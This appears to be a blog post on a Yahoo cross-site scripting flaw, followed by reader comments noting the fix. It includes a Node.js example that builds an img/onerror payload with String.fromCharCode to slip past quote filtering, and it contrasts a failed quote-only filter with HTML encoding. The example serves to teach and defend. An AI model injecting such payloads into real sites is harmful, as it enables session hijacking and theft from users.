Writeup on Yahoo XSS
Rarely Greys posted a rather long article about how you can exploit users on Yahoo through cross site scripting vulnerabilities. The attack we all know and love. It’s a pretty interesting philosophical take on the issue, actually. It does get technical near the end, including a Perl script that generates the attack on the fly.
In the end the vulnerability comes down to this exploit (click to see the XSS vulnerability). It uses an onerror event handler on an image tag, and since quotes are filtered it builds the string it needs with String.fromCharCode, which takes only numeric arguments and so gets by without a single quote character. Well done. Not really news, except that the writeup is pretty interesting, as it goes into a lot more detail about how the attack works than I typically do.
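To make the quote-free trick concrete, here is an added example (mine, not code from the writeup or its Perl script) that runs under Node.js. It builds the image/onerror vector with a String.fromCharCode argument, shows that a filter which only escapes quote characters leaves the payload intact, and shows that HTML-entity encoding the output does neutralize it. The helper names, the `alert` target and the `src=x` attribute are my own choices for illustration.

```javascript
// Added example: quote-free XSS payload construction, a quote-only filter
// that fails to stop it, and context-aware encoding that does.

// Turn an arbitrary string into a String.fromCharCode(...) expression so
// the resulting JavaScript contains no quote characters at all.
function toFromCharCode(str) {
  const codes = Array.from(str, (ch) => ch.charCodeAt(0));
  return `String.fromCharCode(${codes.join(",")})`;
}

// Recover the string a browser would compute from such an expression,
// without using eval. Shows the round trip is lossless.
function decodeFromCharCode(expr) {
  const m = /^String\.fromCharCode\(([\d,]*)\)$/.exec(expr);
  if (!m) throw new Error("not a fromCharCode expression");
  return String.fromCharCode(...m[1].split(",").filter(Boolean).map(Number));
}

// The classic vector: a broken image whose onerror handler runs script.
// src=x never loads, so onerror fires as soon as the tag is parsed.
function buildPayload(jsArgument) {
  return `<img src=x onerror=alert(${toFromCharCode(jsArgument)})>`;
}

// A naive "fix" that backslash-escapes only quote characters, the kind of
// patch that a quote-free payload sails straight through.
function escapeQuotesOnly(input) {
  return input.replace(/["']/g, (q) => "\\" + q);
}

// HTML-entity encoding for untrusted text placed in an HTML body or
// inside a quoted attribute value.
function htmlEncode(input) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  };
  return input.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Crude check: is there still a live <img ... onerror=...> tag in the
// output? Sufficient for this demonstration; real detection uses a parser.
function containsLiveHandler(html) {
  return /<img[^>]*\bonerror\s*=/i.test(html);
}

// Demonstration values (constructed for this example).
const payload = buildPayload("XSS");
const afterQuoteFilter = escapeQuotesOnly(payload);   // unchanged
const afterEncoding = htmlEncode(payload);            // inert text

console.log(payload);
console.log("survives quote-only filter:", containsLiveHandler(afterQuoteFilter));
console.log("survives HTML encoding:   ", containsLiveHandler(afterEncoding));
```

The point of the two filters side by side: stripping or escaping quotes addresses one payload shape, not the injection itself. Encoding for the output context (here HTML body or attribute) removes the `<` that starts the tag, so no handler attribute is ever parsed regardless of how the attacker spells the string.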

June 14th, 2007 at 6:39 pm
This was also posted by TX here: http://sla.ckers.org/forum/read.php?3,44,12494#msg-12494 (not sure who found it first)
June 15th, 2007 at 12:25 am
Very interesting though.
June 15th, 2007 at 2:27 am
…and it’s Slashdotted.
What’s interesting about being Slashdotted is that you get to see the current public opinion (really???).
I found this thread interesting.
… and this one reminded me that there’s still a lot to be done for awareness; and that’s where such flaws are welcome.
p.s. Did I just say “awareness-through-FUD”???
June 15th, 2007 at 8:57 am
Did they fix it already? I tried clicking the link in both Opera and Firefox and got no alert box or anything.
I just checked the source; I suppose they are escaping the quotes now.
June 15th, 2007 at 12:58 pm
fixed
September 21st, 2007 at 4:39 pm
This hole is fixed, but there is another XSS hole at search.yahoo.com, which I wrote about at my site (http://websecurity.com.ua/1372/). It is necessary to check for holes (and the whole fixed script) after fixing, especially in the case of XSS, where there are a lot of bypass techniques.
So Yahoo needs to fix the new hole in their search engine. And they need another Jeremiah Grossman to help them with security.
Yahoo, feel free to contact me.